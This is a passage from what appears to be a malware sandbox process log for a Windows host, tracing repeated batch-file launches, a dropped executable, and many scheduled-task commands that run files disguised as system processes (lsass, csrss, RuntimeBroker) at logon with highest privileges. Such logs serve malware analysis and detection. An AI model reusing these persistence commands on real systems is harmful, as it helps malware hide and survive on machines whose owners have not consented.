C:\Windows\system32\notepad.exenotepad.exe8⤵PID:376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10840
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:3100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10924
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:2640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10984
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11096
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11192
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11228
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6108
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10652
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11124
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:3416
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7340
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6076
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11296
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11368
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11472
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11576
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11640
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11724
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11800
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11868
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11984
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12032
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12116
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12212
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:11016
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12052
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12316
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12408
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12488
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12560
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12608
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:13004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12716
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:13384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12848
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:13152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:12900
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:13544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13028
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:12944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13100
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:13740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13144
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:13748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13200
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:13468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13188
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:13712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:13572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BkTaWGfMnd.bat"7⤵PID:13796
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:13872
-
-
C:\Users\Default User\sppsvc.exe"C:\Users\Default User\sppsvc.exe"8⤵
- Executes dropped EXE
PID:14080
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\Services\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3304
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Common Files\Services\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\Services\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\System\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\System\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2280
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2548
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Local Settings\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Default\Local Settings\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Local Settings\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft\Edge\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4820
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\Edge\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Pictures\Camera Roll\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Camera Roll\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1548
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Pictures\Camera Roll\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1376
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Vss\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Vss\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\Vss\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\TextInputHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\BrowserCore\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\Windows\LiveKernelReports\Refcrt.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1880
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\Windows\LiveKernelReports\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1184
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Offline\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Offline\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1632
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Offline\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1420
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 8D715348D1F514382D391B9DADBEDDEB2⤵
- Loads dropped DLL
PID:5708
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 405700FC9208ADC26E47BFC4C26B779D2⤵
- Loads dropped DLL
PID:5784
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A179D5F2D83C7D9F0B48A399E5D2812A E Global\MSI00002⤵
- Loads dropped DLL
PID:4892 -
C:\Windows\SysWOW64\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"3⤵PID:2548
-
C:\Windows\System32\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow644⤵PID:1316
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:6140 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaecc3cc40,0x7ffaecc3cc4c,0x7ffaecc3cc582⤵PID:5244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,1062568391366015814,11947684738492929904,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1940 /prefetch:22⤵PID:2548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,1062568391366015814,11947684738492929904,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2156 /prefetch:32⤵PID:5200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,1062568391366015814,11947684738492929904,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2292 /prefetch:82⤵PID:1444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,1062568391366015814,11947684738492929904,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3188 /prefetch:12⤵PID:5344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,1062568391366015814,11947684738492929904,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3216 /prefetch:12⤵PID:2004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4404,i,1062568391366015814,11947684738492929904,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4588 /prefetch:12⤵PID:2132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:824
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffaecc3cc40,0x7ffaecc3cc4c,0x7ffaecc3cc582⤵PID:1012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5436 -
